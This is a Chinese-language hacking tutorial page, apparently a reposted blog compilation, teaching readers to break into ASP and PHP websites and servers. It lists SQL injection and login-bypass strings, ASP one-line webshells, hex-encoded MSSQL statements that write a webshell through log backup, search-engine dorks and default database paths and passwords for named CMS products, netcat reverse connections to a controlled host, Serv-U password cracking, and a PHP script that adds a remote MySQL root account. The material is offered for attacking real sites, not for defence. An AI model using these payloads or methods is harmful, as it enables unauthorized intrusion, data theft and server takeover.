`

入侵网站服务器的8种方法

阅读更多

 

1入侵网站服务器的8种方法
1、SQL注入漏洞的入侵
这种是ASP+ACCESS的网站入侵方式,通过注入点列出数据库里面管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL。
2、ASP上传漏洞的利用
这种技术方式是利用一些网站的ASP上传功能来上传ASP木马的一种入侵方式,不少网站都限制了上传文件的类型,一般来说ASP为后缀的文件都不允许上传,但是这种限制是可以被黑客突破的,黑客可以采取COOKIE欺骗的方式来上传ASP木马,获得网站的WEBSHELL权限。
3、后台数据库备份方式获得WEBSHELL
这个主要是利用网站后台对ACCESS数据库进行数据库备份和恢复的功能,备份数据库路径等变量没有过滤导致可以把任何文件的后缀改成ASP,那么利用网站上传的功能上传一个文件名改成JPG或者GIF后缀的ASP木马,然后用这个恢复库备份和恢复的功能把这个木马恢复成ASP文件,从而达到能够获取网站WEBSHELL控制权限的目的。
4、 网站旁注入侵
这种技术是通过IP绑定域名查询的功能查出服务器上有多少网站,然后通过一些薄弱的网站实施入侵,拿到权限之后转而控制服务器的其它网站。
5、sa注入点利用的入侵技术
这种是ASP+MSSQL网站的入侵方式,找到有SA权限的SQL注入点,然后用SQL数据库的XP_CMDSHELL的存储扩展来运行系统命令建立系统级别的帐号,然后通过3389登录进去,或者在一台肉鸡上用NC开设一个监听端口,然后用VBS一句话木马下载一个NC到服务器里面,接着运行NC的反向连接命令,让服务器反向连接到远程肉鸡上,这样远程肉鸡就有了一个远程的系统管理员级别的控制权限。
6、sa弱密码的入侵技术
这种方式是用扫描器探测SQL的帐号和密码信息的方式拿到SA的密码,然后用SQLEXEC之类的工具通过1433端口连接到远程服务器上,然后开设系统帐号,通过3389登录。然后这种入侵方式还可以配合WEBSHELL来使用,一般的ASP+MSSQL网站通常会把MSSQL的连接密码写到一个配置文件当中,这个可以用WEBSHELL来读取配置文件里面的SA密码,然后可以上传一个SQL木马的方式来获取系统的控制权限。
7、提交一句话木马的入侵方式
这种技术方式是对一些数据库地址被改成asp文件的网站来实施入侵的。黑客通过网站的留言版,论坛系统等功能提交一句话木马到数据库里面,然后在木马客户端里面输入这个网站的数据库地址并提交,就可以把一个ASP木马写入到网站里面,获取网站的WEBSHELL权限。
8、 论坛漏洞利用入侵方式
这种技术是利用一些论坛存在的安全漏洞来上传ASP木马获得WEBSHELL权限,最典型的就是,动网6.0版本,7.0版本都存在安全漏洞,拿7.0版本来说,注册一个正常的用户,然后用抓包工具抓取用户提交一个ASP文件的COOKIE,然后用明小子之类的软件采取COOKIE欺骗的上传方式就可以上传一个ASP木马,获得网站的WEBSHELL。

2入侵网站的14种可利用方法
              
1.上传漏洞 upfile.asp, upload.asp,upload_flash.asp ,upfile_soft.asp,upfile_softpic.asp

pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传。还有一些只是检测文件类型的,没有进行后缀名判断,这样的上传只需要把木马文件的开关加个GIF89a就可以通过了。而且可以上传任意文件,在asp和asp.net测试中都可以上传。


2.注入漏洞

pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’-- [admin为表名.]
//看看是什么权限的,如果权限高的话,直接用SQLTOOLS进行连接就可以执行系统命令了。
http://注入网址 and 1=(Select IS_MEMBER(''db_owner''))
http://注入网址 And char(124)%2BCast(IS_MEMBER(''db_owner'') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
http://注入网址 and 1= (Select HAS_DBACCESS(''master''))
http://注入网址 And char(124)%2BCast(HAS_DBACCESS(''master'') as varchar(1))%2Bchar(124)=1 --

3.旁注,也就是跨站

我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了。


4.暴库:把二级目录中间的/换成%5c

eg:http://www.xxx.com/myhome/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1
换成这样的形式提交:http://www.xxx.com/myhome%5Cotherweb ... s.asp?BigClassName=职责范围&BigClassType=1


如果你能看到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.


5.绕过密码验证直接进入后台
’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

’or’’=’    " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- '' or ’a’=’a


6.社会工程学
这个我们都知道吧。就是猜解。猜解一些人们常用的密码,比如他的生日啊,手机号码啊。办公电话啊等等。。

EY:http://www.xxx.cn/waishi/admin

admin waishi


7.写入ASP格式数据库
就是一句话木马[〈%execute request("value")%〉 ],常用在留言本.

EY:http://www.xxx.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马,然后利用ASP后缀名的数据库进行写入木马。也提醒一下站长,MDB数据库改为.asp后缀也是不安全的。

8.源码利用
很多网站用的都是网上下载的源码,有的站长很懒,什么也不改。然后就上传开通网站了,像这样的网站只要知道他用的什么网站的源码做的,自己去网上下载一个,然后就有很多信息可以利用了。像数据库备份,网站后台啊,原始数据库路径啊,上传文件的路径啊等等,都可以进行利用。

EY:http://www.xxxx.edu.cn/xiaoyoulu/index.asp

这个站用的是:杰出校友录,源码我下过了,

默认数据库/webshell路径:/database/liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin

9.默认数据库/webshell路径利用
这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp

/diy.asp

/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

工具:网站猎手 挖掘鸡

EY:http://www.xxx.com/bbs/Databackup/dvbbs7.MDB


10.查看目录法,有一些网站可以浏览目录,可以看到目录下所有的文件。

EY:http://www.xxx.com/shop/admin/

http://www.xxx.com/babyfox/admin/%23bb%23dedsed2s/

这样我们可以找到数据库,下载不用我教吧

11.工具溢出
.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]


12.搜索引擎利用


(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/

(2).找网站的管理后台地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理 〈关键字很多,自已找〉

site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

 


13.COOKIE
把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。然后就直接登录有了网站后台管理员权限了。这个我就不多讲了


14.利用常见的漏洞,如动网BBS

EY:http://www.xxx.com/bbs/index.asp

可以先用:dvbbs权限提升工具,使自已成为前台管理员。

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包
                 
                                                       
3拿到webshell权限的45种方法
1,
到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
2,
到Google ,site:cq.cn inurl:asp
3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆
4,
关键字:Co Net MIB Ver 1.0网站后台管理系统
帐号密码为 'or'='or'

5.
动感购物系统
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6。
默认数据库地址blogdata/acblog.asa
关键字:acblog
7.
百度 /htdocs
注册里可以直接上传asa文件!

8.
/Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version

9.
用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp
10.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)
11.
Upfile_Article.asp bbs/upfile.asp
输入关键字:powered by mypower ,
12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
13.
现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
14.
键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛
挖掘鸡的关键字 添 setup.asp

15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手 下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了
16.
1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb 试试
17.
无忧传奇官方站点程序。
1、后台管理地址:http://您的域名/msmiradmin/
2、默认后台管理帐号:msmir
3、默认后台管理密码:msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp
18.
百度里输入/skins/default/
19.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞 工具使用
20.
上传漏洞.
工具 : Domain3.5
网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp

21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
\database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb
22.
通吃所有商城+动力上传系统
使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.
注射漏洞
百度搜索:oioj's blog
24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'
26.
入侵魔兽私服
需要的工具:ASP木马一只。
Domain3.5明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb
27.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp
28.
国外站的爆库漏洞
关键字:sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php
29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:"intext:Discuz! 4.1.0"
30.
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP木马
31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp
32.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb
33.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp
34.
关键子 XXX inurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到 在 config.asp内。
35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径
36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'
37.
关键字:Powered by:QCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp
38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.
39.
关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
40.
一、通过GOOGLE搜索找大量注入点
关键字:asp?id=1 gov.jp/ asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧
41.
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd
42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录 进入
默认数据库地址:Database/DataShop.mdb
43.
关键字: inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马
44.
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!
45.
关键字:程序核心:BJXSHOP网上开店专家
后台:/admin

4注射入侵思路及流程
一. 寻找并获得具有一定权限的注射漏洞网站
二. 找出的注射漏洞网站一般分两种数据库类型(mmsql 和access),那么不同的数据库类型当然需要不同的入侵方法。
1. mmsql数据库:
  一是通过注射点爆出管理员用户和密码,找出后台登录,进一步提升权限。
      二是通过注射点猜解网站所在服务器上的物理路径,从而进行差异备份插入一句话木马客户端,获得webshell后进一步进行权限提升。
2.access数据库:对于这种数据库就只能是去爆管理的用户密码,或者其他用户资料,然后进行后台登录。
    
 成功登录后台后获取webshell的方法一般是:
        1.cookie欺骗上传asp后门,如果能直接上传asp马那算你运气好。
        2.在无法上传asp后门的情况下,上传图片文件后进行数据库操作功能备份成asp格式。
    在网络安全攻与防之间有一门很重要的学问和艺术 社会工程学
    
    社会工程学就是使人们顺从你的意愿、满足你的欲望。
    举个例子:在你发现一台有漏洞的目标服务器 却被断开网络(物理隔离)也就成了最安全的计算机,然而你却能运用这门学问说服某人(admin)把这台有漏洞的已经隔离的计算机连上网络。
    利用自己的思维去揣摩别人的心理,促使其发生的非主意识的行为。运用灵活的复杂的人际关系来获许想要得到的信息。
    如何很好的利用社会工程学,前提是对网络安全各方面都要有一定的了解和自己的认识。也就是个人的综合能力,在遇到一些问题后能够运用自己所掌握的知识和学问独立的去解决一些实际问题。
           
题外话:当然入侵一个站点需要很好的运气,说运气不如说是目标服务器的管理员大意疏忽的一些漏洞和bug被你挖掘到了,那恭喜。
下面我们切入正题:
实例中需要运用到的工具:
流行注射工具:NBSI3、啊D-SQL注射工具 明小子web综合检测工具
一.通过baidu google 简单找注射漏洞网站。
我们进入baidu或google的高级搜索选项,以baidu为例如图1
我们要搜索内容是 被baidu收录的 具有黑客关键字的网站连接地址并且含有 asp?的网址(URL)。
我们就可以从中寻找具有注射漏洞的网址。
例:http://www.xxx.asp.com/show.asp?id=1
判断能否进行SQL注入:我们直接在后面加单引号’如果返回出错页面或许存在注射点。如果网站管理员对sql注入有点了解把单引号过滤掉了你用单引号测试,是测不到注入点的。
那么哪种判断方法准确呢?下面就是为你介绍的经典的1=1、1=2测试法了。看例:
http://www.xxx.asp.com/show.asp?id=1
http://www.xxx.asp.com/show.asp?id=1 ;;and 1=1
http://www.xxx.asp.com/show.asp?id=1 ;;and 1=2
            看上面三个网址返回的结果:可以注入的表现:
            ① 正常显示
            ② 正常显示,内容基本与①相同
            ③ 返回出错页面或提示找不到记录、或显示内容为空。
           
            不可以注入就比较容易判断了,①同样正常显示,②和③一般都会有程序定义的错误提示,或提示类型转换时出错。
            可以用一些注射相关的工具自行判断注射点如图2,
推荐这种方法,但原理还需掌握。
本教程的主题及篇幅有限,其他相关的我就不多介绍了,大家去找些关于sql原理的文章或教程看看。
二. 入侵思路及过程
access数据库:对于这种数据库就只能是去爆管理的用户密码,或者其他用户资料,然后进行后台登录。
    以工具为例,注射爆出管理员用户及密码(一般MD5加密)如图3,
手工破解原理我会在附带教程里打包建议大家看sql注入天书。
    进入http://www.xmd5.com/http://www.cmd5.com/ 对md5 密文进行爆破。当然可以尝试暴力破解。得到解密后密码如图4
        找出后台地址,登录后台,获取webshell。如图5
   
        mmsql数据库: 爆管理员密码和access数据库类似,这里就不多讲。sql注射中的DB_OWNER角色如果把sa等同于administrator的话DB_OWNER角色相当于user权限。Sa权限的话既然是administrator,那提权就不多讲。这里讲下相当于user 的DB_OWNER权限获得webshell方法。以前通常用backup,但是如果对于大站数据库庞大,成功率可想而知。后来有了差异备份,将马的代码插入到数据库中,然后备份前后数据的差异部分。这样比直接将数据库备份在体积上大大缩小了。然而数据库内的一些数据由于偶然与备份后的代码冲突而出错导致失败,成功率仍然很低。现在最有效的方法是导出日志获得webshell。
     
     先要了解DB_OWNER权限下通过以上方法获取webshell的一些必要条件。
1. Web和数据库在同一服务器
2. 已经得到网站绝对路径
3. 你要备份到的目的目录有写的权限
4. 有backup的权限
    下面实例讲解:
    注射点:http://www.xxxxx.dk/off_vis_film.asp?id=154 用工具啊D检测情况如图6
    接下来试试列目录的功能,如果能列目录,仔细找,只要不是数据库与web分离的,就能找网站目录。这是个苦力活耐心点。
alter database ZZZZ set RECOVERY FULL
create table cmd (a image)
backup log ZZZZ to disk = ''c:\Sammy'' with init
insert into cmd (a) values (''<%Execute(request("a"))%>'')
backup log ZZZZ to disk = ''c:\web\ma.asp''
[这里ZZZZ表示数据库名
c:\web\ 表示网站绝对路径 <%Execute(request("a"))%> 一句话马]
实际操作过程中,我们把字符转换下:
先执行: alter database XXXX set RECOVERY FULL ? ? ? ? ? ? ? ? //把数据库日志备份类型转换为int
第 一 步: 新建一个临时表
create table [dbo].[sh*t_tmp] ([cmd] [image])--
第 二 步 备份数据库日志
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x633A5C53616D6D79 backup log @a to disk = @s with init,no_truncate—
(0x633A5C53616D6D79 = c:\Sammy)
第 三 步 插入一句话马
Insert into [sh*t_tmp](cmd) values(0x3C25457865637574652872657175657374282261222929253E)—
(0x3C25457865637574652872657175657374282261222929253E =<%Execute(request("a"))%>)
第 四 步 导出日志到网站目录下
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s= 0x63003A005C007800780078005C0032002E00610073007000 backup log @a to disk=@s with init,no_truncate—
(0x63003A005C007800780078005C0032002E00610073007000 =c:\web\ma.asp)
第 五 步 删除临时表。
Drop table [sh*t_tmp]—
现在已经有人写出了工具getwebshell如图7。
工具和本文章课件会在配套教程里一起打包。
备份成功后浏览该文件应该像这样出现乱码如图8。
我们用一句话木马的控制端写入一句话代码如图9。
将备份好的http://www.xxx.com/ma.asp 密码a及webshell代码 填入 点上传 成功获得weshell

5 Php脚本注射检测后的再次提权
方法一:爆破法.
     最显眼的要属用户名和密码了,关键是如何破密码呢?到网上搜了一个专门破SERV-U密码的工具(Serv-UPassCrack1.0a.rar),太慢了,这要等到何年何月啊!干脆用记事本打开它的脚本crack.vbs.看看解密原理:假设原来明文密码用"password_mingwen"表示,密文密码也就是 我们在ServUDaemon.ini中看到的密码(34位),用"password_miwen"表示,密文的前两位合并上明文,然后经MD5加密后正 好等于密文的后三十二位!】
     即:md5(password_mingwen+left(password_miwen,2)=right (password_miwen,32)俗话说的好啊,"工欲善其事,必先利其器"在网上找了两上绝配的工具!一个是MD5CrackSpV2.3(速度 增强版,一个非常好用的MD5爆破工具),另一个是字典专家.BBSt,利用它我们可以生成前两位为我们指定字母的字典!!MD5CrackSpV2.3 速度奇快,我们可以指定开的线程数,我在P4,256M内存环境下做了一个测试,利用字典专家.BBSt生成一个含3亿条记录,1.2G左右的字典, 用MD5CrackSpV2.3开8线程跑,总共用了30分钟!一个线程一秒钟跑大约2万条记录,8个线程一秒钟,就是16万条记录!!照此计算一台机器 一天就能跑约138亿条记录!假如有十台P4连合作业,威力无穷啊!同时在网上看到消息说山东大学已经研究出来了破解MD5的算法!但是没有找到具体的程序,程序一旦出世,密而不密,恐怕很多网站又要遭殃了!!
     方法二:程序法.
     不要在一棵树上吊死,一边挂着字典爆破,一边看看还有没有别的途径,双 管齐下吗,要不闲着也是闲着(哈哈)!在c:\Program Files\Serv-U\ServUDaemon.ini文件中共有十多位用户,其中有一个的用户目录:"d:\s***n\a***lover\ photo\gallery" 吸引了我。立即在浏览器中打上http://www.*****.net/ a***lover/photo/gallery 出现如下提示:"This Virtual Directory does not allow contents to be listed",在试试它的上一级目录看看:http://www.*****.net/ a***lover/photo/真是山重水复疑无路,柳暗花明又一村啊!原来在机子里还藏着个某某网络相册.
    首先注册个用户进去看看,有图片上传功能 啊,抓包看看是否存在有类似动网UPFILE的漏洞,用NC提交后失败了,上传类型还是图片文件,又是那句话:"此路不通"。利用CASI查看http: //www.*****.net/ a***lover/photo/index.php的文件内容得知:程序中文名称:文本图片管理程序 程序英文名称:NEATPIC 版本:2.0.13 BETA,老规矩先到网上下个研究研究在说。经过分析目录结构发现在:database/user.php文件用于存放用户名密码等注册信息!用CASI 打开:http://www.*****.net/ a***lover/photo/database/user.php显示无文件内容!难道是默认目录不对?!管理员把目录改了!!看配置文件: http://www.*****.net/ a***lover/photo/inc/config.inc.php发现:
// 参数设置
//*********************************
$DataDir = "database678"; //杂项数据存放目录
$CatDir = "second"; //二级分类数据存放目录
$SortDir = "main"; //分类数据文件存放目录
$PicRecordDir = "picdata"; //图片数据总目录
$PicDir = "pic"; //图片文件存放目录
$SPicDir = "spic"; //缩略图存放目录
$CommentDir = "comment"; //图片评论目录
$UserDat = "user.php"; //用户数据文件
$Dat = "dat.php"; //相册数据文件
果然管理员把默认的database目录改成了database678了!现在可以用CASI查看user.php的内容了如下图:
 

   面的哪一行即ID=1的为管理员的注册信息,第一个为用户名,第二个为密码。发现该用户名与ServUDaemon.ini中的相同,密码会不会也相同呢? (很多人都有使用同一密码的习惯!!)打开DOS窗口-->登录FTP-->输入用户名和密码,成功了,终于成功了!揪出这个密码可真不容易 啊!!这时字典还在哪挂着来,要跑出这个8位纯字母的密码也要费一段时间啊!!
一、 上传PHPSHELL,控制MYSQL数据库
    通过 ServUDaemon.ini文件中的Access1=D:\s***n\ a***lover\photo\gallery |RWAMLCDP知道该用户具有:读取(R),写入(W),追加(A)等功能,唯独缺少了"执行(E)"功能!利用PUT命令上传一个一句话的 WebShell上去.在浏览器中运行http://www.*****.net/ a***lover/photo/gallery/webshell.php?cmd=dir,出现:
Warning: passthru(): Unable to fork [dir] in D:\s***n\a***lover\photo\gallery\webshell.php on line 1
看 来外部命令不能执行,管理员一定作了相应设置.再上传一个phpinfo.php文件 在浏览器中运行:http://www.*****.net/ a***lover/photo/gallery/phpinfo.php,这时在php.ini变量的设置都显示出来了(当然也你可以利用CASI看 c:\windows\php.ini 的内容)!外部命令不能执行的原因在此:
以下是引用片段:
safe_mode
Off
Off
safe_mode_exec_dir
no value
no value
safe_mode_gid
Off
Off
safe_mode_include_dir
no value
no value

    接下来上传一个自己编的仅带有浏览,拷贝,重命名,删除文件和上传文件五个功能的PHPSHELL:CMD.PHP
    注: 由于时间仓促代码界面没优化好,在dir文本框中输入要浏览的目录名称;copy文本框中,上面输入源文件如d:\web\cmd.php,下面输入目标 文件如d:\web\cmdbak.php;del文本框中输入要删除的文件名如:d:\web\cmdbak.php;ren命令与copy命令相似; 点浏览按钮,选择你要上传的文件,然后点upload按钮,就上传到与本SHELL相同的目录下了.
    运行: http://www.*****.net/ a***lover/photo/gallery/cmd.php,利用dir命令,可以看D盘,C:\windows,以及C:\Program Files下的内容,而且对D盘还有写权限!在通过copy命令把想下载的软件考到WEB目录下下载下来了^_^
    如何才能把文件写到只读的C盘上呢?这就要通过MYSQL了!但是MYSQL没有远程连接啊!没有条件创造条件,看文章系统的配置文件config.inc.php的内容了吗?
$dbhost="localhost";//数据库主机名
$dbuser="root";//数据库用户名
$dbpass="******";//数据库密码
$dbname="article";//数据库名
    数据库用户名和密码都知道了,可惜的是本地用户,然而我们能不能通过本地有最高权限用户root来添加个远程用户呢?答案是肯定的。
    为此专门写了个程序adduser.php利用已知的有ROOT权限的帐号添写加远程ROOT权限的帐号,内容如下:
以下是代码片段:
$dbh=mysql_connect('localhost:3306','root','*****');//
echo mysql_errno().": ".mysql_error()."
";
mysql_select_db('mysql');
echo mysql_errno().": ".mysql_error()."
";
$query="GRANT ALL PRIVILEGES ON *.* TO username@'%'IDENTIFIED BY 'password' WITH GRANT OPTION";
$res=mysql_query($query, $dbh);
echo mysql_errno().": ".mysql_error()."
";
$err=mysql_error();
if($err){
echo "ERROR!";
}
else{
echo "ADD USER OK!";
}

 

<script type="text/javascript"><!-- google_ad_client = "pub-1985112462197986"; /* 2011 300x250, 创建于 11-1-10 */ google_ad_slot = "3747659418"; google_ad_width = 300; google_ad_height = 250; //--> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script><script type="text/javascript"><!-- google_ad_client = "pub-1985112462197986"; /* 2011 300x250, 创建于 11-1-10 */ google_ad_slot = "6774061634"; google_ad_width = 300; google_ad_height = 250; //--> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics